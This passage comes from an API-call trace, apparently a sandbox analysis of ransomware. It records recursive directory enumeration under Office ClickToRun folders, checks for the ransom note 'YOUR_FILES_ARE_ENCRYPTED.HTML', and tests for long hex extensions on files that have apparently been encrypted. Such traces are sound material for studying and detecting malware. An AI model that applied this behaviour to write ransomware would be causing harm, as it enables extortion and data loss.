cFileName="DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140", cAlternateFileName="DEPLOY~1.214")) returned 1 [0169.596] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned 131 [0169.596] lstrcmpW (lpString1="DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.596] PathFindExtensionW (pszPath="DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned=".214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140" [0169.597] lstrlenW (lpString=".214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned 65 [0169.597] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96c2d3b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcae283e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C", cAlternateFileName="DEPLOY~1.D6A")) returned 1 [0169.597] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned 131 [0169.597] lstrcmpW (lpString1="DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.597] PathFindExtensionW 
(pszPath="DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned=".D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C" [0169.597] lstrlenW (lpString=".D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned 65 [0169.597] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1 [0169.597] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned 55 [0169.597] GetProcessHeap () returned 0x270000 [0169.597] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.597] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" [0169.597] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*" [0169.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.597] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Catalog", cAlternateFileName="")) returned 1 [0169.598] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned 63 [0169.598] GetProcessHeap () returned 0x270000 [0169.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.598] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" [0169.598] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*" [0169.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.598] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.598] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Packages", cAlternateFileName="")) returned 1 [0169.598] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned 72 [0169.598] GetProcessHeap () returned 0x270000 [0169.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.601] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" [0169.601] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*" [0169.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.602] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", 
cAlternateFileName="")) returned 1 [0169.602] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.602] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0169.602] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.602] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0169.602] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned 111 [0169.602] GetProcessHeap () returned 0x270000 [0169.602] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0169.603] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" [0169.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*" [0169.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0169.603] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.603] 
FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.603] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0169.603] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.603] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 1 [0169.603] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned 150 [0169.604] GetProcessHeap () returned 0x270000 [0169.604] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0169.606] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" [0169.606] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*" [0169.606] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0169.606] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.606] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcae746a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E", cAlternateFileName="DEPLOY~1.DEA")) returned 1 [0169.606] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned 243 [0169.606] lstrcmpW (lpString1="DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.606] PathFindExtensionW (pszPath="DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned=".DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E" [0169.606] lstrlenW (lpString=".DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned 65 [0169.606] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f9afd70, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x2f9afd70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb16e220, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4ad286, dwReserved0=0x0, dwReserved1=0x60, cFileName="Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C", cAlternateFileName="")) returned 1 [0169.606] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned 228 [0169.606] lstrcmpW (lpString1="Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.607] PathFindExtensionW (pszPath="Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned=".08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C" [0169.607] lstrlenW (lpString=".08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned 65 [0169.607] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3149d650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3149d650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb194380, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F", cAlternateFileName="USERDE~1.886")) returned 1 [0169.607] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned 247 [0169.609] lstrcmpW (lpString1="UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.609] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned=".88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F" [0169.609] lstrlenW (lpString=".88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned 65 [0169.609] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2ef2ef, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B", cAlternateFileName="USERMA~1.12A")) returned 1 [0169.609] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned 232 [0169.609] lstrcmpW (lpString1="UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.609] PathFindExtensionW 
